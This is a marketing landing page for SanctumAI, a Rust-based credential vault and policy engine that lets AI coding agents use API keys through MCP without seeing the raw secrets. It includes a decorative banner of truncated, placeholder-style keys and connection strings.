Credential Security for AI Agents

The Identity Control Plane
for AI Agents

Your agents need credentials. They shouldn't need your secrets.

Get StartedView Documentation
sk-proj-4nX8k...a9ZtAKIA3MZD7XKJR8V2Q4LPghp_x7Kd9mN3pQr5tW2vY8zBxoxb-1234-5678-abcdefBearer eyJhbGciOi...STRIPE_SECRET_KEY=sk_live_...GITHUB_TOKEN=gho_9xK2m...ANTHROPIC_API_KEY=sk-ant-...postgres://admin:s3cr3t@db.prod:5432mongodb+srv://root:p4$$w0rd@cluster0.abc.netOPENAI_API_KEY=sk-...AWS_SECRET_ACCESS_KEY=wJalr...-----BEGIN RSA PRIVATE KEY-----redis://default:s3cur3@cache.internal:6379SLACK_BOT_TOKEN=xoxb-...DATABASE_URL=mysql://root:...@prod:3306vault.retrieve("openai/api-key")sanctum.policy.evaluate(agent, credential)lease.renew(ttl: 3600)audit.log(action: "credential_use")fn encrypt(plaintext: &[u8]) -> Vec<u8>agent.request_credential("aws/*")proxy.forward(req, masked: true)SELECT api_key FROM credentials WHERE...sanctum.lease.create(agent, ttl: 7200)ctx.enforce(policy, action: "use")

The Problem

Every AI coding assistant needs API keys. Today those keys live in .env files — plaintext, no access control, no audit trail.

Plaintext secrets in .env files

Every API key sits in plaintext. Any process — or compromised agent — can read them all.

No access control per agent

Claude, Cursor, your Python scripts — they all share the same skeleton key to everything.

Zero audit trail

When a key leaks, you have no idea which agent accessed it, when, or why.

How It Works

Use, Don't Retrieve

The core differentiator: agents use credentials without ever seeing them.

01

Agent requests credential use

Your AI agent asks to use a credential through the MCP protocol — it never sees the raw secret.

02

Policy engine evaluates

SanctumAI checks identity, time windows, access counts, and delegation rules in real time.

03

Operation performed, secret never exposed

The API call is made on behalf of the agent. The credential stays in the vault — always.

Features

Everything you need to secure agent credentials

Policy Engine

Define rules once, agents operate within boundaries. Time-based windows, access counts, and delegation controls.

Credential Leasing

Time-limited, access-counted, with delegation. Credentials expire automatically after their lease window.

Full Audit Trail

HMAC-chained, tamper-evident, OCSF-native logging. Every credential access recorded with full context.

MCP Native

First-class Model Context Protocol integration. Works with Claude Desktop, Cursor, Windsurf, and any MCP client.

Zero Dependencies

Single Rust binary, cross-platform. Install on macOS, Linux, or Windows — no runtime, no containers, no config.

Memory Safe

Rust type system with secrecy + zeroize. Secrets are zeroed from memory after use — no leaks, no residue.

Security By Design

The Credential Control Plane

Sanctum sits between your agents and their targets. Secrets are used, never retrieved.

Your Workstation

Claude

Code Assistant

GPT

Research Agent

Cursor

IDE Copilot

Codex

Code Generator

Custom Agent

Internal Tool

Request

Trust Boundary

SanctumAI Vault

Policy Engine • Credential Vault • Audit Log

Vault Executes

External APIs

OpenAI API

LLM Provider

AWS Services

Cloud Infra

GitHub API

Source Control

Stripe API

Payments

Database

Postgres

Agents request. The vault executes.

Agents request. The vault executes.

0+

Tests

0

Platforms

0

Dependencies

<5min

Time to First Credential

For Developers

5 minutes to first credential

Store a secret, create a policy, and start the MCP server. Your AI agents get scoped access instantly — no YAML files, no cloud setup, no boilerplate.

Get StartedRead the Docs
terminal

Ready to secure your AI agents?

Stop leaving API keys in plaintext. Start with SanctumAI in under 5 minutes — no cloud account required for local-first mode.

Get StartedView on GitHub